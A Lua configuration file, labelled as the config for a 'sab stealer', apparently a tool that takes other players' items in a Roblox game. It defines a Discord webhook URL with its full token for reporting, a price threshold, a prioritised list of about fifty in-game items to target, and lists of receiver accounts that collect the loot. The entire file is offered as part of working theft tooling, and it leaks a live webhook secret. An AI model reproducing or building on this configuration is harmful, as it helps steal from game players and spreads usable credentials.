-- 🔗 Config sab stealer
local config = {}

config.PRICE_LIMIT = 10_000_000
config.WEBHOOK = "https://discord.com/api/webhooks/1416064670598565959/gCvLihXvyqIuE-NqwUP7XrbFSw9Yj0DJCoy9eez0ysXeG9j2_YolynrALL0qZGMQJc-O"

config.targetNames = {
    {name = "Strawberry Elephant", priority = 1},
    {name = "Meowl", priority = 2},
    {name = "Dragon Cannelloni", priority = 3},
    {name = "Headless Horseman", priority = 25},
    {name = "Capitano Moby", priority = 4},
    {name = "Fragrama and Chocrama", priority = 25},
    {name = "Garama and Madundung", priority = 5},
    {name = "La Supreme Combinasion", priority = 6},
    {name = "Burguro And Fryuro", priority = 7},
    {name = "La Casa Boo", priority = 25},
    {name = "Spooky and Pumky", priority = 8},
    {name = "La Secret Combinasion", priority = 25},
    {name = "La Taco Combinasion", priority = 8},
    {name = "Ketchuru and Musturu", priority = 9},
    {name = "Tralaledon", priority = 25},
    {name = "Los Spaghettis", priority = 25},
    {name = "Spaghetti Tualetti", priority = 25},
    {name = "Chillin Chili", priority = 25},
    {name = "Chipso and Queso", priority = 25},
    {name = "La Spooky Combinasion", priority = 10},
    {name = "La Extinct Grande", priority = 25},
    {name = "Ketupat Kepat", priority = 25},
    {name = "Tictac Sahur", priority = 11},
    {name = "Nuclearo Dinossauro", priority = 25},
    {name = "Los Primos", priority = 11},
    {name = "Los Tacoritas", priority = 12},
    {name = "Eviledon", priority = 25},
    {name = "Los Bros", priority = 13},
    {name = "Los Hotspotsitos", priority = 25},
    {name = "Tacorita Bicicleta", priority = 14},
    {name = "Money Money Puggy", priority = 25},
    {name = "Los Puggies", priority = 25},
    {name = "Las Sis", priority = 15},
    {name = "Esok Sekolah", priority = 16},
    {name = "La Grande Combinasion", priority = 17},
    {name = "Los Spooky Combinasionas", priority = 25},
    {name = "Los 67", priority = 25},
    {name = "Los Combinasionas", priority = 25},
    {name = "Los Nooo My Hotspotsitos", priority = 25},
    {name = "Los Mobilis", priority = 18},
    {name = "67", priority = 19},
    {name = "Mariachi Corazoni", priority = 20},
    {name = "Los Chicleteiras", priority = 21},
    {name = "Quesadillo Vampiro", priority = 25},
    {name = "Mieteteira Bicicleteira", priority = 25},
    {name = "Secret Lucky Block", priority = 22},
    {name = "Quesadilla Crocodila", priority = 25},
    {name = "Burrito Bandito", priority = 25},
    {name = "Swag Soda", priority = 23},
}

config.Displayname = { "OzlKDVna", "aimabtdc730", "thaitaptap2", "Betonamuontop", "Vietpet99_01" }
config.Receiver = { "ThaiBeo01", "ThaiBeo02", "OzlKDVna", "vietpet99_01", "Betonamuontop" }
return config
